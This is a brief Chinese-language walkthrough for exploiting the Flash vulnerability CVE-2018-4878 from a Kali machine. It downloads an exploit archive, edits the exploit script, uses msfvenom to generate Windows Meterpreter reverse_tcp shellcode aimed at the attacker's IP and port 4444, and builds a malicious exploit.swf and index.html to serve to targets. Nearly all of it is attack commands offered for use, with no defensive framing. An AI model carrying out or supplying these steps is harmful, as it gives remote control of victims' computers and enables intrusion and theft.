步骤过程
1.下载脚本利用
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
2、下载安装rar解压工具
①.下载
wget https://www.rarlab.com/rar/rarlinux-x64-5.5.0.tar.gz
②.解压
tar zxvf rarlinux-x64-5.5.0.tar.gz
③.安装
cd rar
make
make install
3、解压脚本
解压前,先创建文件夹CVE-2018-4878
rar e CVE-2018-4878
.解压压缩文件后,可看到cve-2018-4878.py和exploit.swf。
4.修改cve-2018-4878.py
我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。
5.查找本机ip
ifconfig
6.生成shellcode.txt
生成shellcode.txt可以查看kali的shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.130 LPORT=4444 -f python>shellcode.txt
cat shellcode.txt
查看shellcode,并替换cve-2018-4878里面原来的shellcode,修改路径
生成要用的exploit.swf和index.html
python cve-2018-4878.py